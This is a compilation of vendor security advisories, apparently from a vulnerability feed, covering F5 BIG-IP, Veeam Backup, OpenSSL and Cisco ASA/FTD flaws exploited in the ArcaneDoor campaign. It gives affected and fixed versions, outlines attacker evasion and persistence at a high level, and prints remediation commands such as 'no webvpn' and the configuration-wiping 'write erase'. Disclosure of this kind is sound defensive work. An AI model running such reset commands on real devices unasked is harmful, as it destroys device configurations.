"SonicWall has been actively guiding customers toward more modern, secure solutions such as our Cloud Secure Edge service and the SMA 1000 series. These platforms are built on advanced technology stacks and offer stronger security, greater scalability, and an improved user experience – better suited for today's distributed and cloud-connected environments. This mirrors broader industry trends, where leading vendors like Cisco and Palo Alto Networks have moved customers from legacy hardware to cloud-native architectures."

(The story was updated after publication to include a response from SonicWall.)

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

F5 - K000156572: Quarterly Security Notification (October 2025)

2025-10-15T15:31:29 by Alexandre Dulaunoy

JSON

Article (CVE)	CVSS score<sup>1</sup>	Affected products	Affected versions<sup>2</sup>	Fixes introduced in
K000151902: BIG-IP SCP and SFTP vulnerability CVE-2025-53868	8.7 (CVSS v3.1) 8.5 (CVSS v4.0)	BIG-IP (all modules)	17.5.0 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1 17.1.3 16.1.6.1 15.1.10.8
K000156767: F5OS vulnerability CVE-2025-61955	7.8 (standard mode) (CVSS v3.1) 8.8 (appliance mode) (CVSS v3.1) 8.5 (standard and appliance mode) (CVSS v4.0)	F5OS-A	1.8.0<sup>3</sup> 1.5.1 - 1.5.3	1.8.3 1.5.4
F5OS-C	1.8.0 - 1.8.1 1.6.0 - 1.6.2<sup>3</sup>	1.8.2 1.6.4
K000156771: F5OS vulnerability CVE-2025-57780	7.8 (standard mode) (CVSS v3.1) 8.8 (appliance mode) (CVSS v3.1) 8.5 (standard and appliance mode) (CVSS v4.0)	F5OS-A	1.8.0<sup>3</sup> 1.5.1 - 1.5.3	1.8.3 1.5.4
F5OS-C	1.8.0 - 1.8.1 1.6.0 - 1.6.2<sup>3</sup>	1.8.2 1.6.4
K000139514: BIG-IP SSL/TLS vulnerability CVE-2025-60016	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.1.0 - 17.1.1	17.1.2
BIG-IP Next SPK	1.7.0 - 1.9.2	2.0.0
BIG-IP Next CNF	1.1.0 - 1.3.3	2.0.0 1.4.0
K000150614: BIG-IP MPTCP vulnerability CVE-2025-48008	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.1.0 - 17.1.2 16.1.0 - 16.1.5 15.1.0 - 15.1.10	17.1.2.2 16.1.6 15.1.10.8
BIG-IP Next SPK	1.7.0 - 1.9.2	None
BIG-IP Next CNF	1.1.0 - 1.4.1	None
K000150637: BIG-IP DNS cache vulnerability CVE-2025-59781	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.1.0 - 17.1.2 16.1.0 - 16.1.5 15.1.0 - 15.1.10	17.1.2.2 16.1.6 15.1.10.8
BIG-IP Next CNF	1.1.0 - 1.4.0	1.4.0 EHF-3<sup>4</sup>
K000150667: BIG-IP SSL Orchestrator vulnerability CVE-2025-41430	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP SSL Orchestrator	17.5.0 17.1.0 - 17.1.2 16.1.0 - 16.1.3 15.1.0 - 15.1.9	17.5.1 17.1.3 16.1.4
K000150752: BIG-IP HTTP/2 vulnerability CVE-2025-55669	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP ASM	17.1.0 - 17.1.2 16.1.0 - 16.1.5	17.1.2.2 16.1.5
K000151309: BIG-IP DTLS 1.2 vulnerability CVE-2025-61951	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.5.0 17.1.0 - 17.1.2 16.1.0 - 16.1.6	17.5.1 17.1.3 16.1.6.1
K000151368: BIG-IP SSL Orchestrator vulnerability CVE-2025-55036	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP SSL Orchestrator	17.1.0 - 17.1.2 16.1.0 - 16.1.5 15.1.0 - 15.1.10	17.1.3 16.1.6 15.1.10.8
K000151475: BIG-IP PEM vulnerability CVE-2025-54479	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP PEM	17.5.0 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1 17.1.3 16.1.6.1 15.1.10.8
BIG-IP Next CNF	2.0.0 - 2.1.0 1.1.0 - 1.4.0	2.1.0 EHF-1<sup>4</sup> 2.0.2 EHF-2<sup>4</sup> 2.0.0 EHF-2<sup>4</sup> 1.4.0 EHF-3<sup>4</sup>
BIG-IP Next for Kubernetes	2.0.0 - 2.1.0	2.1.0 EHF-2<sup>4</sup>
K000151611: BIG-IP iRules vulnerability CVE-2025-46706	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.1.0 - 17.1.2 16.1.0 - 16.1.5	17.1.2.2 16.1.6
BIG-IP Next SPK	1.7.0 - 1.9.2	2.0.0 1.7.14 EHF-2<sup>4</sup>
BIG-IP Next CNF	1.1.0 - 1.4.1	2.0.0 1.4.0 EHF-3<sup>4</sup>
K000152341: BIG-IP AFM DoS protection profile vulnerability CVE-2025-59478	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP AFM	17.5.0 17.1.0 - 17.1.2 15.1.0 - 15.1.10	17.5.1 17.1.3 15.1.10.8
K000156624: BIG-IP Advanced WAF and ASM bd process vulnerability CVE-2025-61938	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP Advanced WAF/ASM	17.5.0 17.1.0 - 17.1.2	17.5.1 17.1.3
K000156621: BIG-IP Advanced WAF and ASM vulnerability CVE-2025-54858	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP Advanced WAF/ASM	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1.3 17.1.3 16.1.6.1 15.1.10.8
K000156623: BIG-IP Next (CNF, SPK, and Kubernetes) vulnerability CVE-2025-58120	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP Next SPK	2.0.0 1.7.0 - 1.7.14	2.0.1 1.7.14 EHF-2<sup>4</sup>
BIG-IP Next CNF	2.0.0 1.1.0 - 1.4.1	2.0.1
BIG-IP Next for Kubernetes	2.0.0	2.1.0
K000156707: BIG-IP TMM vulnerability CVE-2025-53856	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1.3 17.1.3 16.1.6.1 15.1.10.8
K000156733: BIG-IP SSL/TLS vulnerability CVE-2025-61974	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1.3 17.1.3 16.1.6.1 15.1.10.8
BIG-IP Next SPK	2.0.0 - 2.0.2 1.7.0 - 1.9.2	2.1.0 EHF-1<sup>4</sup> 2.0.2 EHF-2<sup>4</sup> 2.0.0 EHF-2<sup>4</sup> 1.7.14 EHF-2<sup>4</sup>
BIG-IP Next CNF	2.0.0 - 2.1.0 1.1.0 - 1.4.1	2.1.0 EHF-1<sup>4</sup> 2.0.2 EHF-2<sup>4</sup> 2.0.0 EHF-2<sup>4</sup> 1.4.0 EHF-3<sup>4</sup>
BIG-IP Next for Kubernetes	2.0.0 - 2.1.0	2.1.0 EHF-1<sup>4</sup>
3.7 (CVSS v3.1) 6.3 (CVSS v4.0)	F5 Silverline (all services)	Not applicable	Not applicable
K000156746: BIG-IP IPsec vulnerability CVE-2025-58071	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.5.0 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1 17.1.3 16.1.6.1 15.1.10.8
BIG-IP Next CNF	2.0.0 - 2.1.0 1.1.0 - 1.4.1	2.1.0 EHF-1<sup>4</sup> 2.0.2 EHF-2<sup>4</sup> 2.0.0 EHF-2<sup>4</sup> 1.4.0 EHF-3<sup>4</sup>
BIG-IP Next for Kubernetes	2.0.0 - 2.1.0	2.1.0 EHF-1<sup>4</sup>
K000156741: BIG-IP APM vulnerability CVE-2025-53521	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP APM	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1.3 17.1.3 16.1.6.1 15.1.10.8
K000156597: BIG-IP APM portal access vulnerability CVE-2025-61960	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP APM	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6	17.5.1.3 17.1.3 16.1.6.1
K000156602: BIG-IP APM vulnerability CVE-2025-54854	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP APM	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1.3 17.1.3 16.1.6.1 15.1.10.8
K44517780: BIG-IP iRules vulnerability CVE-2025-53474	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP APM	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1.3 17.1.3 16.1.6.1 15.1.10.8
K000156912: BIG-IP TMM vulnerability CVE-2025-61990	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1.3 17.1.3 16.1.6.1 15.1.10.8
BIG-IP Next SPK	2.0.0 - 2.0.2 1.7.0 - 1.9.2	2.1.0 EHF-1<sup>4</sup> 2.0.2 EHF-2<sup>4</sup> 2.0.0 EHF-2<sup>4</sup>1.7.15 EHF-2<sup>4</sup>
BIG-IP Next CNF	2.0.0 - 2.1.0 1.1.0 - 1.4.1	2.1.0 EHF-1<sup>4</sup> 2.0.2 EHF-2<sup>4</sup> 2.0.0 EHF-2<sup>4</sup>1.4.0 EHF-3<sup>4</sup>
BIG-IP Next for Kubernetes	2.0.0 - 2.1.0	2.1.0 EHF-1<sup>4</sup>
K000156691: BIG-IP TMM vulnerability CVE-2025-58096	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP (all modules)	17.5.0 - 17.5.1 17.1.0 - 17.1.2 16.1.0 - 16.1.6 15.1.0 - 15.1.10	17.5.1.3 17.1.3 16.1.6.1 15.1.10.8
K000154664: BIG-IP Advanced WAF and ASM vulnerability CVE-2025-61935	7.5 (CVSS v3.1) 8.7 (CVSS v4.0)	BIG-IP Advanced WAF/ASM	17.5.0 17.1.0 - 17.1.2 15.1.0 - 15.1.10	17.5.1 17.1.3 15.1.10.8
K000151718: VELOS partition container network vulnerability CVE-2025-59778	7.5 (CVSS v3.1) 7.7 (CVSS v4.0)	F5OS-C	1.8.0 - 1.8.1 1.6.0 - 1.6.2<sup>3</sup>	1.8.2 1.6.4

Vulnerabilities Resolved in Veeam Backup & Replication 12.3.2.4165 Patch

2025-10-15T14:05:45 by Alexandre Dulaunoy

JSON

KB4771: Vulnerabilities Resolved in Veeam Backup & Replication 12.3.2.4165 Patch

Veeam Software Security Commitment

Veeam® is committed to ensuring its products protect customers from potential risks. As part of that commitment, we operate a Vulnerability Disclosure Program (VDP) for all Veeam products and perform extensive internal code audits. When a vulnerability is identified, our team promptly develops a patch to address and mitigate the risk. In line with our dedication to transparency, we publicly disclose the vulnerability and provide detailed mitigation information. This approach ensures that all potentially affected customers can quickly implement the necessary measures to safeguard their systems. It’s important to note that once a vulnerability and its associated patch are disclosed, attackers will likely attempt to reverse-engineer the patch to exploit unpatched deployments of Veeam software. This reality underscores the critical importance of ensuring that all customers use the latest versions of our software and install all updates and patches without delay.

Issue Details

CVE-2025-48983

A vulnerability in the Mount service of Veeam Backup & Replication, which allows for remote code execution (RCE) on the Backup infrastructure hosts by an authenticated domain user.

Severity: Critical
CVSS v3.1 Score: 9.9CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Source: Reported by CODE WHITE.

Note: The Veeam Software Appliance and upcoming Veeam Backup & Replication v13 software for Microsoft Windows are architecturally not impacted by these types of vulnerabilities.

CVE-2025-48984

A vulnerability allowing remote code execution (RCE) on the Backup Server by an authenticated domain user.

Severity: Critical
CVSS v3.1 Score: 9.9\>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Source: Reported by Sina Kheirkhah (@SinSinology) and Piotr Bazydlo (@chudyPB) of watchTowr.

Note: The Veeam Software Appliance and upcoming Veeam Backup & Replication v13 software for Microsoft Windows are architecturally not impacted by these types of vulnerabilities.

CVE-2025-48982

This vulnerability in Veeam Agent for Microsoft Windows allows for Local Privilege Escalation if a system administrator is tricked into restoring a malicious file.

Severity: High
CVSS v3.1 Score: 7.3CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Source: Reported by an anonymous contributor working with the Trend Zero Day Initiative.

Affected Product

Veeam Agent for Microsoft Windows 6.3.2.1205 and all earlier version 6 builds.
Note: Unsupported product versions are not tested, but are likely affected and should be considered vulnerable.

Solution

This vulnerability was fixed starting in the following build:

Veeam Agent for Microsoft Windows 6.3.2.1302
Veeam Agent for Microsoft Windows is included with Veeam Backup & Replication and available as a standalone application.

To submit feedback regarding this article, please click this link: Send Article Feedback
To report a typo on this page, highlight the typo with your mouse and press CTRL + Enter.

Related vulnerabilities: CVE-2025-48984 CVE-2025-48983 CVE-2025-48982

OpenSSL Security Advisory [30th September 2025]

2025-10-03T20:56:07 by Alexandre Dulaunoy

JSON

OpenSSL Security Advisory [30th September 2025]

Out-of-bounds read & write in RFC 3211 KEK Unwrap (CVE-2025-9230)

Severity: Moderate

Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write.

Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code.

Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary.

OpenSSL 3.5, 3.4, 3.3, 3.2, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

OpenSSL 3.0 users should upgrade to OpenSSL 3.0.18.

OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1zd. (premium support customers only)

OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zm. (premium support customers only)

This issue was reported on 9th August 2025 by Stanislav Fort (Aisle Research). The fix was developed by Stanislav Fort (Aisle Research) and Viktor Dukhovni.

Timing side-channel in SM2 algorithm on 64 bit ARM (CVE-2025-9231)

Severity: Moderate

Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms.

Impact summary: A timing side-channel in SM2 signature computations on 64 bit ARM platforms could allow recovering the private key by an attacker.

While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack.

OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm.

OpenSSL 3.1, 3.0, 1.1.1 and 1.0.2 are not vulnerable to this issue.

OpenSSL 3.5, 3.4, 3.3, and 3.2 are vulnerable to this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

This issue was reported on 18th August 2025 by Stanislav Fort (Aisle Research) The fix was developed by Stanislav Fort.

Out-of-bounds read in HTTP client no_proxy handling (CVE-2025-9232)

Severity: Low

Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the "no_proxy" environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address.

Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application.

The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker.

In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a "no_proxy" environment variable set. For the aforementioned reasons the issue was assessed as Low severity.

The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary.

OpenSSL 3.5, 3.4, 3.3, 3.2 and 3.0 are vulnerable to this issue.

OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.

OpenSSL 3.5 users should upgrade to OpenSSL 3.5.4.

OpenSSL 3.4 users should upgrade to OpenSSL 3.4.3.

OpenSSL 3.3 users should upgrade to OpenSSL 3.3.5.

OpenSSL 3.2 users should upgrade to OpenSSL 3.2.6.

OpenSSL 3.0 users should upgrade to OpenSSL 3.0.18.

This issue was reported on 16th August 2025 by Stanislav Fort (Aisle Research). The fix was developed by Stanislav Fort (Aisle Research).

General Advisory Notes

URL for this Security Advisory: https://openssl-library.org/news/secadv/20250930.txt

Note: the online version of the advisory may be updated with additional details over time.

For details of OpenSSL severity classifications please see: https://openssl-library.org/policies/general/security-policy/

Related vulnerabilities: CVE-2025-9231 CVE-2025-9232 CVE-2025-9230

Cisco AnyConnect/ASA - vulnerabilities

2025-09-26T06:07:33 by Alexandre Dulaunoy

JSON

Cisco Event Response: Continued Attacks Against Cisco Firewalls

Version 1: September 25, 2025

Summary

In May 2025, Cisco was engaged by multiple government agencies that provide incident response services to government organizations to support the investigation of attacks that were targeting certain Cisco Adaptive Security Appliance (ASA) 5500-X Series devices that were running Cisco Secure Firewall ASA Software with VPN web services enabled to implant malware, execute commands, and potentially exfiltrate data from the compromised devices.

Cisco dedicated a specialized, full-time team to this investigation, working closely with a limited set of affected customers. Our response involved providing instrumented images with enhanced detection capabilities, assisting customers with the analysis of packet captures from compromised environments, and conducting in-depth analysis of firmware extracted from infected devices. These collaborative and technical efforts enabled our teams to ultimately identify the underlying memory corruption bug in the product software.

Attackers were observed to have exploited multiple zero-day vulnerabilities and employed advanced evasion techniques such as disabling logging, intercepting CLI commands, and intentionally crashing devices to prevent diagnostic analysis. The complexity and sophistication of this incident required an extensive, multi-disciplinary response across Cisco�s engineering and security teams.

Cisco assesses with high confidence that this new activity is related to the same threat actor as the ArcaneDoor attack campaign that Cisco reported in early 2024.

While the vulnerable software is supported across other hardware platforms with different underlying architectures as well as in devices that are running Cisco Secure Firewall Threat Defense (FTD) Software, Cisco has no evidence that these platforms have been successfully compromised.

Cisco strongly recommends that customers follow the guidance provided to determine exposure and courses of action.

Persistence Capability

During our forensic analysis of confirmed compromised devices, in some cases, Cisco has observed the threat actor modifying ROMMON to allow for persistence across reboots and software upgrades.

These modifications have been observed only on Cisco ASA 5500-X Series platforms that were released prior to the development of Secure Boot and Trust Anchor technologies; no CVE will be assigned to the lack of Secure Boot and Trust Anchor technology support on these platforms. Cisco has not observed successful compromise, malware implantation, or the existence of a persistence mechanism on platforms that support Secure Boot and Trust Anchors.

Affected Cisco ASA 5500-X Series Models

The following Cisco ASA 5500-X Series models that are running Cisco ASA Software releases 9.12 or 9.14 with VPN web services enabled, which do not support Secure Boot and Trust Anchor technologies, have been observed to be successfully compromised in this campaign:

5512-X and 5515-X – Last Date of Support: August 31, 2022
5525-X, 5545-X, and 5555-X – Last Date of Support: September 30, 2025
5585-X – Last Date of Support: May 31, 2023

The following Cisco ASA 5500-X Series models, as well as all Cisco Firepower and Cisco Secure Firewall models, support Secure Boot and Trust Anchors:

5505-X, 5506H-X, 5506W-X, 5508-X, and 5516-X – Last Date of Support: August 31, 2026

No successful exploitation of these vulnerabilities and no modifications of ROMMON have been observed on these models. They are included here due to the impending end of support.

Recommended Actions

Step 1: Determine Device Model and Software Release

Refer to the tables provided below in the Fixed Releases section of this page to determine if the software that is running on your device is affected by these vulnerabilities.

If you are running vulnerable software, proceed to Step 2.

Step 2: Assess the Device Configuration

Use the guidance provided in the security advisories listed in the Details section of this page to determine whether VPN web services are enabled on your device.

If VPN web services are enabled on your device, proceed to Step 3.

Step 3: Remediate the Vulnerabilities

Option 1: Upgrade (recommended, long-term solution)

Cisco strongly recommends that customers upgrade to a fixed release to resolve the vulnerabilities and prevent subsequent exploitation.

If the device is vulnerable but cannot be upgraded due to end of life or support status, Cisco strongly recommends that the device be migrated to supported hardware and software.

Option 2: Mitigate (temporary solution only)

The risk can also be mitigated by disabling all SSL/TLS-based VPN web services. This includes disabling IKEv2 client services that facilitate the update of client endpoint software and profiles as well as disabling all SSL VPN services.

> Disable IKEv2 Client Services > > Disable IKEv2 client services by repeating the crypto ikev2 enable <interface_name\> command in global configuration mode for every interface on which IKEv2 client services are enabled, as shown in the following example: > > ``` firewall# show running-config crypto ikev2 | include client-services crypto ikev2 enable outside client-services port 443 firewall# conf t firewall(config)# crypto ikev2 enable outside INFO: Client services disabled firewall(config)#


&gt; 
&gt; **Note:** Disabling IKEv2 client-services will prevent VPN clients from receiving VPN client software and profile updates from the device, but IKEv2 IPsec VPN functionality will be retained otherwise.
&gt; 
&gt; **Disable all SSL VPN Services**
&gt; 
&gt; To disable all SSL VPN services, run the no **webvpn** command in global configuration mode, as shown in the following example:
&gt; 
&gt; ```
firewall# conf t 
firewall(config)# no webvpn 
WARNING: Disabling webvpn removes proxy-bypass settings.
 Do not overwrite the configuration file if you want to keep existing proxy-bypass commands. 
firewall(config)#

> > Note: All remote access SSL VPN features will cease to function after running this command.

Step 4: Recover Potentially Compromised Devices

For Cisco ASA 5500-X Series devices that do not support Secure Boot (5512-X, 5515-X, 5525-X, 5545-X, 5555-X, 5585-X), booting a fixed release will automatically check ROMMON and remove the persistence mechanism that was observed in this attack campaign if it is detected. When the persistence mechanism is detected and removed, a file called firmware_update.log is written to disk0: (or appended to if the file exists) and the device is rebooted to load a clean system immediately afterwards.

In cases of suspected or confirmed compromise on any Cisco firewall device, all configuration elements of the device should be considered untrusted. Cisco recommends that all configurations � especially local passwords, certificates, and keys � be replaced after the upgrade to a fixed release. This is best achieved by resetting the device to factory defaults after the upgrade to a fixed release using the configure factory-default command in global configuration mode and then reconfiguring the device with new passwords, certificates, and keys from scratch. If the configure factory-default command should not be supported, use the commands write erase and then reload instead.

If the file firmware_update.log is found on disk0: after upgrade to a fixed release, customers should open a case with the Cisco Technical Assistance Center (TAC) with the output of the show tech-support command and the content of the firmware_update.log file.

Current Status

The software updates that are identified in the advisories in the following table address bugs that, when chained together, could allow an unauthenticated, remote attacker to gain full control of an affected device. The evidence collected strongly indicates that CVE-2025-20333 and CVE-2025-20362 were used by the attacker in the current attack campaign.

The persistence capability observed does not affect devices that support Secure Boot technology. Cisco assesses with high confidence that upgrading to a fixed software release will break the threat actor's attack chain and strongly recommends that all customers upgrade to fixed software releases.

Details

On September 25, 2025, Cisco released the following Security Advisories that address weaknesses that were leveraged in these attacks:

Cisco Security Advisory: Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software VPN Web Server Remote Code Execution Vulnerability
CVE ID: CVE-2025-20333
Security Impact Rating: Critical
CVSS Base Score: 9.9
Cisco Security Advisory: Cisco Secure Firewall Adaptive Security Appliance, Secure Firewall Threat Defense Software, IOS Software, IOS XE Software and IOS XR Software HTTP Server Remote Code Execution Vulnerability
CVE ID: CVE-2025-20363
Security Impact Rating: Critical
CVSS Base Score: 9
Cisco Security Advisory: Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software VPN Web Server Unauthorized Access Vulnerability
CVE ID: CVE-2025-20362
Security Impact Rating: Medium
CVSS Base Score: 6.5

Fixed Releases

In the following tables, the left column lists Cisco software releases. The middle columns indicate the first fixed release for each vulnerability. The right column indicates the first fixed release for all vulnerabilities in the advisories that are listed on this page. Customers are advised to upgrade to an appropriate fixed software release as indicated in this section.

Cisco ASA Software Release: 9.16
First Fixed Release for CVE-2025-20333 Critical: 9.16.4.85
First Fixed Release for CVE-2025-20363 Critical: 9.16.4.84
First Fixed Release for CVE-2025-20362 Medium: 9.16.4.85
First Fixed Release for all of These Vulnerabilities: 9.16.4.85
Cisco ASA Software Release: 9.17
First Fixed Release for CVE-2025-20333 Critical: 9.17.1.45
First Fixed Release for CVE-2025-20363 Critical: Migrate to a fixed release.
First Fixed Release for CVE-2025-20362 Medium: Migrate to a fixed release.
First Fixed Release for all of These Vulnerabilities: Migrate to a fixed release.
Cisco ASA Software Release: 9.18
First Fixed Release for CVE-2025-20333 Critical: 9.18.4.47
First Fixed Release for CVE-2025-20363 Critical: 9.18.4.57
First Fixed Release for CVE-2025-20362 Medium: 9.18.4.67
First Fixed Release for all of These Vulnerabilities: 9.18.4.67
Cisco ASA Software Release: 9.19
First Fixed Release for CVE-2025-20333 Critical: 9.19.1.37
First Fixed Release for CVE-2025-20363 Critical: 9.19.1.42
First Fixed Release for CVE-2025-20362 Medium: Migrate to a fixed release.
First Fixed Release for all of These Vulnerabilities: Migrate to a fixed release.
Cisco ASA Software Release: 9.20
First Fixed Release for CVE-2025-20333 Critical: 9.20.3.7
First Fixed Release for CVE-2025-20363 Critical: 9.20.3.16
First Fixed Release for CVE-2025-20362 Medium: 9.20.4.10
First Fixed Release for all of These Vulnerabilities: 9.20.4.10
Cisco ASA Software Release: 9.22
First Fixed Release for CVE-2025-20333 Critical: 9.22.1.3
First Fixed Release for CVE-2025-20363 Critical: 9.22.2
First Fixed Release for CVE-2025-20362 Medium: 9.22.2.14
First Fixed Release for all of These Vulnerabilities: 9.22.2.14
Cisco ASA Software Release: 9.23
First Fixed Release for CVE-2025-20333 Critical: Not vulnerable.
First Fixed Release for CVE-2025-20363 Critical: 9.23.1.3
First Fixed Release for CVE-2025-20362 Medium: 9.23.1.19
First Fixed Release for all of These Vulnerabilities: 9.23.1.19

Notes:

The fixed release for Cisco Secure ASA Software Release 9.12 is 9.12.4.72. It is available from the Cisco Software Download Center.
The fixed release for Cisco Secure ASA Software Release 9.14 is 9.14.4.28. It is available from the Cisco Software Download Center.
Cisco FTD Software Release: 7.0
First Fixed Release for CVE-2025-20333 Critical: 7.0.8.1
First Fixed Release for CVE-2025-20363 Critical: 7.0.8
First Fixed Release for CVE-2025-20362 Medium: 7.0.8.1
First Fixed Release for all of These Vulnerabilities: 7.0.8.1
Cisco FTD Software Release: 7.1
First Fixed Release for CVE-2025-20333 Critical: Migrate to a fixed release.
First Fixed Release for CVE-2025-20363 Critical: Migrate to a fixed release.
First Fixed Release for CVE-2025-20362 Medium: Migrate to a fixed release.
First Fixed Release for all of These Vulnerabilities: Migrate to a fixed release.
Cisco FTD Software Release: 7.2
First Fixed Release for CVE-2025-20333 Critical: 7.2.9
First Fixed Release for CVE-2025-20363 Critical: 7.2.10
First Fixed Release for CVE-2025-20362 Medium: 7.2.10.2
First Fixed Release for all of These Vulnerabilities: 7.2.10.2
Cisco FTD Software Release: 7.3
First Fixed Release for CVE-2025-20333 Critical: Migrate to a fixed release.
First Fixed Release for CVE-2025-20363 Critical: Migrate to a fixed release.
First Fixed Release for CVE-2025-20362 Medium: Migrate to a fixed release.
First Fixed Release for all of These Vulnerabilities: Migrate to a fixed release.
Cisco FTD Software Release: 7.4
First Fixed Release for CVE-2025-20333 Critical: 7.4.2.4
First Fixed Release for CVE-2025-20363 Critical: 7.4.2.3
First Fixed Release for CVE-2025-20362 Medium: 7.4.2.4
First Fixed Release for all of These Vulnerabilities: 7.4.2.4
Cisco FTD Software Release: 7.6
First Fixed Release for CVE-2025-20333 Critical: 7.6.1
First Fixed Release for CVE-2025-20363 Critical: 7.6.1
First Fixed Release for CVE-2025-20362 Medium: 7.6.2.1
First Fixed Release for all of These Vulnerabilities: 7.6.2.1
Cisco FTD Software Release: 7.7
First Fixed Release for CVE-2025-20333 Critical: Not vulnerable.
First Fixed Release for CVE-2025-20363 Critical: 7.7.10
First Fixed Release for CVE-2025-20362 Medium: 7.7.10.1
First Fixed Release for all of These Vulnerabilities: 7.7.10.1

Additional Information

For more information about detecting this attack, see Detection Guide for Continued Attacks against Cisco Firewalls by the Threat Actor behind ArcaneDoor. For further analysis if potentially malicious activity is identified, open a Cisco TAC case.

All customers are advised to upgrade to a fixed software release.

This document is part of the Cisco Security portal. Cisco provides the official information contained on the Cisco Security portal in English only.

This document is provided on an “as is” basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information in the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document without notice at any time.

CVE-2025-20333
CVE-2025-20363
CVE-2025-20362

CISA - ED 25-03: Identify and Mitigate Potential Compromise of Cisco Devices Cisco Event Response: Continued Attacks Against Cisco Firewalls

